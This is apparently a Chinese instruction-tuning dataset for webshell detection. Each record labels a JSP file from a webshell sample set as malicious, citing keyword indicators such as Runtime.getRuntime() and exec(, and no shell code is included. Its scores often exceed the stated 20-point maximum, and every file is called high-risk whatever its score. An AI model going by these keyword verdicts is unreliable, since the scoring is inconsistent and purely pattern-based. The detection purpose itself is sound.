{"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"mysql数据库脱单个表.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"2813 bytes\", \"行数\": 83}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName 恶意度评分: 36/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/jsp/dama/mysql数据库脱单个表.jsp", "malicious_score": 36, "md5_hash": "8be6bf08adf7e006ca0aeec91de99607"}}
{"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"1.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"85057 bytes\", \"行数\": 2345}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 324/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/jsp/dama/1.jsp", "malicious_score": 324, "md5_hash": "c098b099edd6f9ff28ab92f0324b3263"}}
{"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"JspSpyJDK5.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"86578 bytes\", \"行数\": 2408}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 包含网络功能: HttpURLConnection 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 316/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/jsp/dama/JspSpyJDK5.jsp", "malicious_score": 316, "md5_hash": "e2c6d448be904f177e2bfe5295253d2c"}}
{"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"jspshall.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"35291 bytes\", \"行数\": 862}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 恶意度评分: 117/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/jsp/dama/jspshall.jsp", "malicious_score": 117, "md5_hash": "efe0f6edaa512c4e1fdca4eeda77b7ee"}}
{"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"ma2.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"32024 bytes\", \"行数\": 807}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter 具备文件操作能力: copy\\s*\\( 恶意度评分: 112/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/jsp/dama/ma2.jsp", "malicious_score": 112, "md5_hash": "e94e8a70845ae6fac92209fc3099beb9"}}
{"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"非常牛逼的Jsp大马.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"30030 bytes\", \"行数\": 994}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: copy\\s*\\( 恶意度评分: 37/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/jsp/dama/非常牛逼的Jsp大马.jsp", "malicious_score": 37, "md5_hash": "450ab7e8b1cd9ebb09b4fe7d4fcf353c"}}
{"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"system.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"16864 bytes\", \"行数\": 609}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, request.getParameter, Class.forName 恶意度评分: 18/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/jsp/dama/system.jsp", "malicious_score": 18, "md5_hash": "15ae237cf395fb24cf12bff141fb3f7c"}}
{"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"cat.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"9817 bytes\", \"行数\": 282}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 恶意度评分: 66/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/jsp/dama/cat.jsp", "malicious_score": 66, "md5_hash": "3d5b48ae6e77c0de156721774a227412"}}
{"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"jspbd.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"2359 bytes\", \"行数\": 87}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 恶意度评分: 12/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/jsp/dama/jspbd.jsp", "malicious_score": 12, "md5_hash": "7d5e9732766cf5b8edca9b7ae2b6028f"}}
{"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"minupload.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"2252 bytes\", \"行数\": 48}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/jsp/dama/minupload.jsp", "malicious_score": 9, "md5_hash": "f7edb7db3a55cdd7cd0860256b2ea4ca"}}
{"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"jspspy_k8.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"84422 bytes\", \"行数\": 2323}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 315/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/jsp/dama/jspspy_k8.jsp", "malicious_score": 315, "md5_hash": "b6a185c582cc8682d067701bf3fc6e1b"}}
{"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"JFolder.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"31057 bytes\", \"行数\": 1022}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: copy\\s*\\( 恶意度评分: 37/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/jsp/dama/JFolder.jsp", "malicious_score": 37, "md5_hash": "6bd8edbd1a1c262000d0958a3794fdb6"}}
{"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"2.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"55431 bytes\", \"行数\": 1778}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 发现混淆技术: ord\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 175/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/jsp/dama/2.jsp", "malicious_score": 175, "md5_hash": "5b50da3be91aed89f167b27108adf5d8"}}
{"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"JspWebshell 1.2.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"26075 bytes\", \"行数\": 788}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 86/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/jsp/dama/JspWebshell 1.2.jsp", "malicious_score": 86, "md5_hash": "3ad8871c7e0af131bfb6d354bf229a82"}}
{"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"jspspy.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"84545 bytes\", \"行数\": 2329}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 315/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/jsp/dama/jspspy.jsp", "malicious_score": 315, "md5_hash": "8b258a83b85dcd41a7b666348ff2b9fb"}}
{"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"job.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"57726 bytes\", \"行数\": 1811}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 发现混淆技术: ord\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 175/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/jsp/dama/job.jsp", "malicious_score": 175, "md5_hash": "d6a0655273ed5bf26242ea4c8afcd02a"}}
{"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"ma3.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"84414 bytes\", \"行数\": 2317}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 315/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/jsp/dama/ma3.jsp", "malicious_score": 315, "md5_hash": "f8b45454aad6eacdf78b19a8e4bb8346"}}
{"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"shell.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"30777 bytes\", \"行数\": 1012}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: copy\\s*\\( 恶意度评分: 37/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/jsp/dama/shell.jsp", "malicious_score": 37, "md5_hash": "4ad90629e4fc0bade2b413872bf14219"}}
{"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"browser.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"73483 bytes\", \"行数\": 1934}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: copy\\s*\\( 恶意度评分: 184/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/jsp/dama/browser.jsp", "malicious_score": 184, "md5_hash": "a7e25b8ac605753ed0c438db93f6c498"}}
{"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"list.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"1870 bytes\", \"行数\": 77}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/jsp/dama/list.jsp", "malicious_score": 6, "md5_hash": "1ea290ff4259dcaeb680cec992738eda"}}
{"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"jspspy2012.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"120783 bytes\", \"行数\": 3313}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 465/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/jsp/dama/jspspy2012.jsp", "malicious_score": 465, "md5_hash": "f38767758621d3ba8e46bae11ae5dac1"}}
{"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"cmd_win32.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"823 bytes\", \"行数\": 31}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 恶意度评分: 15/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/jsp/dama/cmd_win32.jsp", "malicious_score": 15, "md5_hash": "cc4d4d6cc9a25984aa9a7583c7def174"}}
{"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"jspShell.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"13250 bytes\", \"行数\": 352}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 恶意度评分: 21/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/jsp/dama/jspShell.jsp", "malicious_score": 21, "md5_hash": "0d5b5a17552254be6c1c8f1eb3a5fdc1"}}
{"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"silic webshell.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"27766 bytes\", \"行数\": 844}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: copy\\s*\\( 恶意度评分: 37/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/jsp/dama/silic webshell.jsp", "malicious_score": 37, "md5_hash": "d8317bf0239a65c4f8055f9e066fdae5"}}
{"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"ma1.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"53835 bytes\", \"行数\": 1811}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 发现混淆技术: ord\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 175/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/jsp/dama/ma1.jsp", "malicious_score": 175, "md5_hash": "e1afc17af43733629dc562c8462024fa"}}
{"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"time.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"3951 bytes\", \"行数\": 99}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 恶意度评分: 36/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/jsp/dama/time.jsp", "malicious_score": 36, "md5_hash": "a6251e89eee049ac6e5bebcb10a749da"}}
{"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"devshell.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"64630 bytes\", \"行数\": 1319}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 233/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/jsp/dama/devshell.jsp", "malicious_score": 233, "md5_hash": "816d7a00ae40ae6d84f9223af2c02f17"}}
{"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"cmdjsp.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"725 bytes\", \"行数\": 32}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/jsp/dama/cmdjsp.jsp", "malicious_score": 9, "md5_hash": "b815611cc39f17f05a73444d699341d4"}}
{"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"cmd.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"829 bytes\", \"行数\": 35}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 恶意度评分: 15/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/jsp/dama/cmd.jsp", "malicious_score": 15, "md5_hash": "5391c4a8af1ede757ba9d28865e75853"}}
{"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"in.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"28853 bytes\", \"行数\": 982}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: copy\\s*\\( 恶意度评分: 37/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/jsp/dama/in.jsp", "malicious_score": 37, "md5_hash": "ffb4ddde520f78481706510db4ab55ab"}}
{"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"菜刀jsp脚本更新版.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"7137 bytes\", \"行数\": 1}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 包含网络功能: HttpURLConnection 具备文件操作能力: mkdir\\s*\\( 恶意度评分: 26/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/jsp/xiaoma/菜刀jsp脚本更新版.jsp", "malicious_score": 26, "md5_hash": "949ffee1e07a1269df7c69b9722d293e"}}
{"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"cmd2.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"364 bytes\", \"行数\": 12}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 恶意度评分: 12/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/jsp/xiaoma/cmd2.jsp", "malicious_score": 12, "md5_hash": "d0831c859163deb1d5e14089eadea0d7"}}
{"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Customize.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"6217 bytes\", \"行数\": 59}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 包含网络功能: HttpURLConnection 具备文件操作能力: mkdir\\s*\\( 恶意度评分: 23/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/jsp/xiaoma/Customize.jsp", "malicious_score": 23, "md5_hash": "8bb7f5a764e51cac59064abc8f93168e"}}
{"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"spjspshell.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"18473 bytes\", \"行数\": 814}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: copy\\s*\\( 恶意度评分: 34/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/jsp/xiaoma/spjspshell.jsp", "malicious_score": 34, "md5_hash": "7ab8dac087317a99e1be1234bc585ce8"}}
{"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"cmd1.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"58 bytes\", \"行数\": 1}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/jsp/xiaoma/cmd1.jsp", "malicious_score": 9, "md5_hash": "657a3d3a22a5cc5bb32c13cc01bbf8d2"}}
{"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"菜刀jsp脚本文明版.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"7142 bytes\", \"行数\": 3}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 包含网络功能: HttpURLConnection 具备文件操作能力: mkdir\\s*\\( 恶意度评分: 26/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/jsp/xiaoma/菜刀jsp脚本文明版.jsp", "malicious_score": 26, "md5_hash": "4dc03a4b41947ca231df42b5f909e287"}}
{"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"菜刀jsp脚本无压缩版.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"8633 bytes\", \"行数\": 305}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 包含网络功能: HttpURLConnection 具备文件操作能力: mkdir\\s*\\( 恶意度评分: 26/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/jsp/xiaoma/菜刀jsp脚本无压缩版.jsp", "malicious_score": 26, "md5_hash": "5a9fec45236768069c99f0bfd566d754"}}
{"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"菜刀jsp修改.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"8304 bytes\", \"行数\": 318}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 包含网络功能: HttpURLConnection 具备文件操作能力: mkdir\\s*\\( 恶意度评分: 32/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tanjiti-webshell-sample", "metadata": {"file_path": "tanjiti-webshell-sample/jsp/xiaoma/菜刀jsp修改.jsp", "malicious_score": 32, "md5_hash": "a30fc57ffcbce80614c36f73e3ceecdb"}}